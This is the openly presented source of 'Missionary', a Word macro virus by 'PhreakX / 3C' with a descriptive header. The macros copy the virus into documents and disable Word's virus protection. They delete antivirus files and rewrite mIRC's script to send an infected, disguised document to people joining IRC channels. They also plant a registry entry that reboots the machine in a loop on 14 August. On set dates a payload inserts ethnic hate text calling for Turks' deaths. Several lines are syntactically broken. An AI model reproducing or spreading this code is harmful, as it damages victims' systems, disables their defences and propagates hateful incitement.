Name of Virus:   Missionary
Author:	         PhreakX / 3C
Type:		 Word Macro
Payload:	 Yes
Retro:		 Yes
Stealth:	 No
Encryption:	 No
Polymorphic:	 No
Cross Infection: No
Comments from author: This is a pretty shit virus as it has no encryption, no poly and no stealth... it spreads throught the irc and it has some date triggers to some payloads, the best payload that I used for this virus is activated on the 14th of August and it makes computer reboot again and again because it is in the registry.


Attribute VB_Name = "missionary"

Sub AutoExec()

On Error Resume Next

Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0

Application.VBE.ActiveVBProject.VBComponents("missionary").Export "C:\WINDOWS\missionary.sys"
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name ="missionary" Then NormInstall = True
Next I
For I = 1 ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name ="missionary" Then ActivInstall = True
Next I
If ActivInstall = True And NormInstall = False Then set Dobj = ActiveDocument.VBProject
Dobj.VBComponents.Import("c:\WINDOWS\missionary.sys")
ActiveDocument.SaveAs Filename: = ActiveDocument.FullName, FileFormat:= wdFormatDocument

CommandBars.("Tools").Controls("Macro").Delete
CommandBars.("Tools").Controls("Templates and Add-Ins...").Delete
CommandBars.("Format").Controls("Style...").Delete

Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.DisplayAlerts = wdAlertsNone
Application.StatusBar = False

Kill "C:\Program Files\AntiViral Toolkit Pro\Avp32.exe"
Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc"
Kill "C:\Program Files\Command Software\F-PROT95\*.dll"
Kill "C:\Program Files\Command Software\F-PROT95\*.exe"
Kill "C:\Program Files\McAfee\VirusScan95\Scan.dat"
Kill "C:\Program Files\McAfee\VirusScan\Scan.dat"
Kill "C:\Program Files\Norton AntiVirus\Viruscan.dat"

End Sub

Sub AutoNew()
On Error Resume Next
k = Dir("c:\mirc\mirc32.exe")
If k = "" Then
Exit Sub
Else
m = Dir("c:\mirc\backup\needforspeedIII.doc")
If m = "" Then ActiveDocument.SaveAs "c:\mirc\backup\needforspeedIII.doc"
Kill "c:\mirc\script.ini"
Open "c:\mirc\script.ini" For Output As #1
Print #1, "[script]"
Print #1, "n0=on 1:text:*virus*:#:/msg $chan Virii Rule"
Print #1, "n1=on 1:text:*virus*:#:/join #vir | /amsg I am infected with Missionary virus by PhreakX"
Print #1, "n2=on 1:text:*missionary*:#:/amsg I am infected with Missionary virus by PhreakX"
Print #1, "n3=on 1:text:*turkey*:#:/msg $chan Turkey sucks"
Print #1, "n4=on 1:join:#:/send $nick c:\mirc\backup\needforspeedIII.doc"
Close #1
End If
End Sub

Sub FileSave()

On Error Resume Next

Randomize
If Day(Now) = 20 Then
MsgBox "Missionary Virus", vbCritical, "3C"
Selection.MoveStart
Selection.TypeText "I am a Missionary, my mission is to inform." & _
Selection.TypeText " The information that I will give you today concerns injustice." & _
Selection.TypeText " On the 20th of July 1974 the Turkish troops under the commands of" & _
Selection.TypeText " Bulet Eccevit invated Cyprus, took over our houses, killed our relatives" & _
Selection.TypeText " raped our mothers and sisters and they still live there." & _
Selection.TypeText " They call southern Cyprus 'Turkey', what they don't understand is that" & _
Selection.TypeText " no matter what they call it, it is still Cyprus." & _
Selection.TypeText " All you Turks out there who believe Cyprus belongs to you" & _
Selection.TypeText " watch out, because someone is after you, and this someone is" & _
Selection.TypeText " PhreakX" & _
Selection.TypeText "---3C Group wants freedom for Cyprus and not war, but as long as" & _
Selection.TypeText " people like Bulet Eccevit, Raouf Degtas and Tatsun Chiller are alive" & _
Selection.TypeText " freedom remains a dream..." & _
Selection.TypeText "+-=PhreakX=-+" & _
Selection.TypeText "   -A Good Turk Is A Dead Turk-"
Beep
MsgBox "You are infected with Missionary Virus by PhreakX. Click on OK if you hate Turks", vbApplicationModal, "Missionary Virus"
End If
ActiveDocument.Save
End Sub

Sub AutoClose()
If Month(Now()) = 8 Then
If Day(Now()) = 14 Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "reboot") = "c:\windows\rundll.exe user.exe,exitwindowsexec"
Shell C:\WINDOWS\RUNDLL.EXE user.exe,exitwindowsexec
End If
End If
End Sub 

Sub EditPaste()
MsgBox "No paste for you boy."
MsgBox "Missionary virus doesn't allow you"
End Sub

Sub EditCopy()
MsgBox "Error on procedure Copy"
End Sub